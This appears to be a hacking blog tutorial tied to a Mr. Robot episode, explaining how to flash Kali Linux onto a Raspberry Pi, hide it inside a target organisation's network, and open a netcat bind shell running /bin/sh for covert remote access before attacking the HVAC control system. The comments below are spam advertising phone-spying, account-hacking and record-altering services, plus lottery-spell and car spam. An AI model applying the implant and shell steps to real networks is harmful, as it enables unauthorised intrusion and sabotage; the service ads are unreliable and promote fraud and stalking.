top of page
Search
  • Writer's pictureotw

Mr Robot Hacks: How Elliot Used a Raspberry Pi to Hack Steel Mountain

Updated: Dec 16, 2022

Welcome back, my Mr Robot afacionados!


A number of you have written me telling me how much you enjoy the Mr. Robot series on USA Network and Amazon Prime. I am also a huge fan! If you haven't seen it yet, you should. It may be the best hacking show on TV.

Mr. Robot is about a young man with a social conscience (with severe social anxiety and a wicked morphine habit) who works in cyber security by day, protecting the network of Evil Corporation; while at night, is a hacker vigilante for good (does this scenario fit anyone we know?). Eventually, he gets recruited by a hacker organization known as fsociety (which looks and acts much like Anonymous) to bring down Evil Corporation.





One of the more interesting parts of the show, from my perspective, is that the hacking is realistic. No swirling, animated viruses like in so many other TV shows and movies, but rather good 'ole command line Linux.


The Hacking Raspberry Pi


In episode 4 ("eps1.3__da3m0ns.mp4"), Elliott, the main character, is planning on using a Raspberry Pi to control the heating system of the storage room where Evil Corp is storing their tape backups. If they can raise the temperature enough in the storage room, it will render those tape backups unusable.

On these tape backups are the records of 70% of the consumer debt in the world, including billions of dollars of student loans. The hackers believe that if they can destroy those records, millions of people will be free of their student loans and consumer debt held by Evil Corp.


In this tutorial, I will show you how to create a hacking Raspberry Pi (for those of you are unaware, a Raspberry Pi is a tiny, inexpensive, credit-card sized computer that is powerful) that can be controlled remotely, similar to what Elliott on Mr. Robot is about to use in this episode.

Step 1: Download the ARM Version of Kali


The first step, of course, is to download the ARM version of Kali. Raspberry Pi and many mobile devices use ARM CPUs as they are more energy efficient and cooler, so the Kali operating system must be compiled specifically for it.

Fortunately, the goods folks at Offensive Security have already done this for us. Navigate to Offensive Security's download page to get the Raspberry Pi file. Once you have downloaded the image, unzip it with WinRAR, WinZip, or any other archiving tool that can unzip files.





Step 2: Download & Install Win32 Disk Imager


Now we need to install the Win32 Disk Imager, which you can download from SourceForge. This tool enables us to write the image to an SD card or USB drive. I recommend a fast SD card of at least 4 GB. You can buy a 16 GB now for about 7 dollars.



Step 3: Run Disk Imager


Now that you have installed Disk Imager, right click on it and run it as "administrator."

Select the Kali image in the "Image File" window, direct the image to your SD card in the "Device" window, then click on the "Write" button. Be patient, this can take sometime.





​If you using Linux, things are bit simpler. No need to download anything. You simply use the dd command (among other things, the dd command is used to create a disk image in digital forensics). If we assume the image is named Kali-RPI.img and the SD card is at /dev/sdc and we want it to copy in 512k block size (bs), then we simply need to type:

kali >dd if =Kali-RPI.img of = /dev/sdc bs=512k


Step 4: Install the SD Card in the Raspberry Pi


We need to remove the SD card from your PC and now install the SD card into our Raspberry Pi and boot it up. When it boots up, it takes you to a command line asking you for your username and password. The default username and password are:

username: kali password: kali

Success! Now you have an tiny Kali hacking tool that can be placed anywhere!


Step 5: Start a Netcat Listener on Raspberry Pi


​Now, that we have Raspberry Pi running Kali, we can place it anywhere within the Evil Corporation network. Raspberry Pi has an Ethernet connection and you can add a wireless adapter. The Raspberry Pi is so small it can be hidden in numerous places. These include inside a desktop computer, inside a telephone, clock, etc. without being noticed.


Once it is connected, we can start a Netcat listener (Netcat is built into Kali) on it by typing:

kali > nc -l -p6996 -e /bin/sh





This will enable Elliott to connect to a terminal on the Raspberry Pi from anywhere using port 6996.


Now, Elliott can connect back to the Raspberry Pi by using Netcat on his Kali system and typing:

kali > nc 192.168.1.105 6996






When he types ifconfig, he can see that he has a terminal on the Raspberry Pi ready to do some hacking of Evil Corp's HVAC system! Make certain to use the IP address of the Raspberry Pi in your environment.




Of course, there are other methods to connecting back to the Raspberry Pi. He could use SSH, and if he wanted a GUI, install the VNC Server and connect back to it with full GUI control over Kali. The problem with both of those methods is that they are more likely to be detected by Evil Corporation's perimeter network defenses.


One innovative way to connect would be to turn the wireless adapter into an Wi-Fi AP. In this way, Elliot and friends could connect to the network remotely or at least the range of Wi-Fi with a good antenna. To turn th eRPI into an AP, see my tutorial on Creating an Evil Twin AP here.


Step 6: Wreak Havoc


Now that Elliott has a Kali installation within Evil Corporation's network, he should be able to use the multitude of tools available for wreaking havoc on Evil Corporation in Kali. In episode 4, he wants to control the HVAC system and turn up the heat to melt the backup tapes. He should be able to do that now that he has embedded Kali within Evil Corporation's network.


HVAC systems are SCADA/ICS systems like nearly all industrial systems. They have small PLC's embedded in them that are controlled by obscure SCADA/ICS protocols. For more on SCADA/ICS systems, see my SCADA Hacking and Security section.




As this show progresses and Elliott demonstrates more hacks, I will try to keep you up on how he does them.


10,982 views4 comments

4 Comments


astriddavina54
astriddavina54
Jan 03, 2023

I’m excited to write about Henry Hacker, he is a great and brilliant hacker who penetrated my spouse’s phone without a physical installation app. And I was able to access my spouse’s phone, SMS, Whatsapp, Instagram, Facebook, Wechat, Snapchat, Call Logs, Kik, Twitter and all social media. The most amazing thing there is that he restores all phone deleted text messages. And I also have access to everything including the phone gallery without touching the phone.I can see the whole secret of my spouse. Contact him for any hacking service. He is also a genius in repairing Credit Score, increasing school grade, Clear Criminal Record etc. His service is fast. Contact:, Henryclarkethicalhacker@gmail.com and on whatsapp him on +1262-236-7526...


Like

Hi everyone... I am Mike Luciano and I’m so addicted to winning the lottery. I’ve just scooped my FOURTH jackpot of $1million – taking my total winnings to $4.6million through the help of one legit spell caster named Dr Amber. My first ever win was $100,000. Last year, I won $500,000 from the Pennsylvania state lottery and I also won $3 million in 2016 bringing the grand total of my winnings to $4.6 million. All my winnings have been made possible with the numbers given to me by Dr Amber. I've been so blessed, winning big three times in my lifetime. His spell casting is unique and safe unlike some fake spell casters that are just after your money without…

Like

A couple of vehicle marks really lay out a fortification in vehicle market like Toyota. Toyota isn't just well known for its plan yet additionally popular for its unwavering quality and toyota camry colors worth as well. It is well known brand in India and, surprisingly, in different nations as well. Numerous Indians truly do like Toyota Vehicles even in the trade-in vehicle market. On the off chance that you are hoping to purchase another car vehicle in Toyota Model then I simply say to stop for few moments and examine Toyota Camry Vehicle.


Like

You can hire Henryclarkethicalhacker for all your hacking needs which include clearing of criminal and driving records, credit hack fix, college grade changes, cloning phones, spying on anyone, hacking all social media accounts, etc,. Reach him via Henryclarkethicalhacker at gmail com,

Text him,, Whatsapp,,+1 8 1 3 4 2 1 1 3 2 6.


Like
bottom of page